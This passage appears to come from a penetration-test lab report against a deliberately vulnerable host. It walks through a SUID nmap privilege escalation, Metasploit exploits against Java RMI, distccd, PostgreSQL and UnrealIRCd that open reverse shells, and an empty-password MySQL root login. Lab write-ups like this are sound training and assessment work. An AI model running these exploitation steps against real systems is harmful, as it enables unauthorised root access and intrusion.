![[Attachments/f6c32c88ee189b825d4328a31f7250d7_MD5.png]] Privilege Escalation ```bash find / -perm -4000 2>/dev/null ``` Result: ![[Attachments/2dd974ee55a44f41e49215e31161bd8c_MD5.png]] Vulnerable Nmap Version ```bash nmap --interactive ``` ```bash nmap> !sh ``` Achieved Root Access ![[Attachments/5a042bd2215f83ae9a479ba2f64b5163_MD5.png]] ## Appendix 9 JAVA RMI ```bash msfconsole ``` ```bash search java rmi ``` Found an available exploit ```bash use exploit/multi/misc/java_rmi_server ``` ![[Attachments/b212034938d1751bd1367461a92ec1c4_MD5.png]] change the options to local host and local port ```bash set LHOST 10.0.1.1 ``` change the RHOSTS to the target machine ```bash set RHOSTS 10.0.1.3 ``` change the HTTPDELAY to 30 seconds ```bash set HTTPDELAY 30 ``` Reverse shell achieved and root access ![[Attachments/2cdcf52d8c0bfb4b9d85dad4b7b75507_MD5.png]] ## Appendix 10 distccd Use searchsploit ```bash searchsploit distc ``` ![[Attachments/7edfe08937768b3c4a3b33572020fa45_MD5.png]] Exploit is available through metasploit ```bash msfconsole ``` ```bash search distcc ``` ![[Attachments/c12a53a58c7bbec12c130e85261aad3b_MD5.png]] ```bash set RHOSTS 10.0.1.3 ``` ```bash show payloads ``` ```bash set payload cmd/unix/reverse ``` ![[Attachments/eec32921f51a3fb7d32611b2c1f1f462_MD5.png]] run Reverse shell achieved for Daemon user ![[Attachments/a6e5213e3def38b88e8ec4ba2dc7889a_MD5.png]] ## Appendix 11 Mysql on port 3306/tcp ```bash mysql -h 10.0.1.3 --ssl=0 -u root -p ``` with an empty password allowed access into the database ![[Attachments/943bb16f94d7df3a5d74b17fd3b27e9f_MD5.png]] Run the command: ```bash show databases; ``` A list of databases on the mysql server ![[Attachments/074f747881c00fe53066a7243174676e_MD5.png]] ## Appendix 12 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 use msfconsole search for postgress auxiliary ![[Attachments/095fd5ed6d2d1b27e8ae8090c8a906a6_MD5.png]] ```bash set RHOSTS 10.0.1.3 ``` ```bash run ``` Successful username and password found ![[Attachments/119a59eb7baf203822b65d0dfd426bfe_MD5.png]] Getting Reverse shell using linux/postgres/postgres_payload msfconsole module ![[Attachments/5221f66b34021c8a0f39a85933d3d3bc_MD5.png]] Terminal Access ![[Attachments/35a2914f7667f2314905d662b46d96da_MD5.png]] ## Appendix 13 unrealirc Unreal3.2.8.1. port 6667 use `msfconsole` `search unrealirc` `use 0` ![[Attachments/64429f7b2a13f03e2c18adf1a4baab67_MD5.png]] ```bash set RHOSTS 10.0.1.3 ``` ```bash set payload 6 ``` ```bash options ``` ```bash set LHOST 10.0.1.1 ``` ```bash run ``` Reverse Shell Achieved ![[Attachments/e98fecbd90364f537325761a177354dc_MD5.png]]